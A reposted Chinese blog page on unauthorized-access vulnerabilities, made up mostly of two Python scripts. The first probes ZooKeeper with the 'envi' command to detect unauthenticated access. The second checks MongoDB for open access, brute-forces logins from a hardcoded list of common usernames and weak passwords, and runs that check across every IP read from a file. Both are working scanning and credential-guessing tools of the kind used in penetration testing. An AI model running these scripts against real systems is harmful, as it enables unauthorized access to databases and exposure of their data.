未授权访问整理
发布日期:2021-08-21 13:18:01 浏览次数:41 分类:技术文章

本文共 3014 字,大约阅读时间需要 10 分钟。

1 #zookeeper Python3 2  3 #-*- coding: utf-8 -*- 4  5 import socket 6  7 def verify(protocol,ip,port): 8     url = ip+':'+str(port) 9     print('testing if zookeeper unanth vul')10     try:11         socket.setdefaulttimeout(3)12         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)13         s.connect((ip, int(port)))14         flag = b"envi"15         s.send(flag)16         data = s.recv(1024)17         s.close()18         if b'Environment' in data:19             msg = 'There is zookeeper unanth vul on url: ' + url + ' .'20             print(msg)21             number = 'v90'22             return True, url, number, msg23         else:24             pass25     except Exception as e:26         print(str(e))27     msg = 'There is no zookeeper unanth vul.'28     number = 'v0'29     return False, url, number, msg30 31 if __name__ == '__main__':32     res = verify('http','xx.116.40.xx',2181)33     print(res)

1 #Mongodb 2 # -*- coding:utf-8 -*- 3  4 import pymongo 5 from pymongo.errors import ServerSelectionTimeoutError 6  7 def verify(ip,port): 8     host = ip+':'+str(port) 9     port = int(port)10     loginnames = ['admin','test','user','root']11     passwd = ['','123456','test','12345678','12345679','root','123456Aa','123456_Aa','123456aA','123456_aA','123QWEASD','admin123','admin','1q2w3e4r','134679']12     print('testing if mongodb vul')13     #是否无认证14     try:15         connection = pymongo.MongoClient(ip,port,serverSelectionTimeoutMS=1000)16         dbs = connection.database_names()17         msg = 'There is a mongodb unauthorized access , password is None'18         number = 'v9'19         print(dbs)20         return True,host,number,msg        21      #端口连不上,直接退出22     except ServerSelectionTimeoutError as e:23         msg = str(e)24         number = 'v0'25         return False,host,number,msg26     except Exception as e:27         msg = str(e)28         number = 'v0'29     #爆破30     for loginname in loginnames:31         for ps in passwd:           32             try:33                 connection.api.authenticate(loginname,ps)34                 dbs = connection.database_names()35                 msg = 'There is a mongodb unauthorized access , username/password is %s' %(loginname,ps)36                 number = 'v9'37                 print(msg)38                 return True,host,number,msg39             except Exception as e:40                 msg = str(e)41                 number = 'v0'42     return False,host,number,msg43 44 if __name__ == '__main__':45         def get_pass_dict():46             pass_dict = []47             with open('./IP.txt', 'r') as f:48                 for line in f.readlines():49                     line = line.strip('\n')50                     pass_dict.append(line)51                 f.close()52             return pass_dict53         IP = get_pass_dict()54         for ip in IP:55             port = '27017'56             res = verify(ip, port)57             print(res)

 

转载于:https://www.cnblogs.com/AtesetEnginner/p/11038269.html

转载地址:https://blog.csdn.net/weixin_33720078/article/details/93704409 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!

上一篇:C语言文件操作
下一篇:博客更换

发表评论

最新留言

很好
[***.229.124.182]2024年03月25日 18时40分28秒

关于作者

    喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!

推荐文章

matlab 图中的legend,matlab中legend加图示命令的使用 2021-06-24
PHP exec xargs 不执行,Linux中的xargs命令及示例 2021-06-24
php 枚举cookie内容,php设置和获取cookie 2021-06-24
单防区扩展模块怎么用_AB罗克韦尔自动化Micro800 扩展 I/O模块型号及功能介绍 2021-06-24
java矩阵类_Java泛型——泛型矩阵类 2021-06-24
java车牌正则表达式_车牌正则表达式 2021-06-24
wordpress4.9.4 mysql_WordPress 将不再支持 PHP4 和 MySQL 4 2021-06-24
安卓是用java语言写的吗_android开发是用java语言吗? 2021-06-24
java 符号 t_java – 运算符”不能应用于’T’,’T’表示有界泛型类型 2021-06-24
用matlab写出信源熵,计算离散信源的熵matlab实现 2021-06-24
php表单yii2,Yii2创建表单(ActiveForm)方法详解 2021-06-24
php 程序授权机制,授权认证详细说明 2021-06-24
java 命令提示符,如何使用Java打开命令提示符并插入命令? 2021-06-24
IP/tzgm.php,LianjiaSpider/在售数量.ipynb at master · BerSerK/LianjiaSpider · GitHub 2019-04-21
linux移动文件的脚本,使用Linux脚本移动文件 2019-04-21
linux查看系统所有变量,Linux系统各指标命令 2019-04-21
linux打印机守护程序,linux下怎么编写守护程序呢? 2019-04-21
嵌入式linux 设置时间,time_clock控件应用,使用命令date -s 12:00:00手动设置时间后,时间就停住不走了,我在Ubuntu和嵌入式Linux平台都测试到了... 2019-04-21
linux 8086下编译,Ubuntu18.04/Linux下安装DosBox进行8086汇编 2019-04-21
linux监控windows,zabbix监控之linux及windows客户端安装配置 2019-04-21